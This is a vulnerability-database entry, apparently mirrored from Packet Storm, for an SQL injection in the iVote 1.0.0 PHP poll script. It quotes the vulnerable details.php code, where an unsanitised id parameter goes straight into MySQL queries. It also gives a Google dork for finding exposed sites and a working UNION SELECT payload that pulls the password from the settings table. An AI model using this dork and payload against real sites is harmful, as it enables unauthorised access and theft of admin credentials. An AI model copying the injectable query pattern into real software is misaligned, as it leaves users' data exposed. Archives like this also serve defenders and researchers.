Lucene search
K

iVote 1.0.0 SQL Injection

🗓️ 10 Jul 2013 00:00:00Reported by Ashiyane Digital Security TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

iVote 1.0.0 SQL Injection vulnerability details on details.ph

Code
`# Exploit Title: iVot Sql Injection  
# Google Dork: inurl:details.php?id=  
# Date: 2013 July 11  
# Exploit Author: Ashiyane Digital Security Team  
# Software Link:  
http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/  
# Version: 1.0.0  
# Tested on: Linux CentOS , Linux Ubunto , Windows 8  
  
vulnerability : details.php on line 5  
  
$id = $_GET['id'];  
  
$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");  
  
$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");  
  
$row = mysql_fetch_array($select);  
  
///////////////////////////////////////  
  
Example : http://example.com/iVote/details.php?id=1 union select  
1,password,3,4 from settings  
  
  
///////////////////////  
TNX : Rz04 & Crypt0  
I Love Iran & all IRanian Black Hats :X  
  
I'm , Bi Edea (R3za)  
Email : [email protected]  
Gmail : [email protected]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation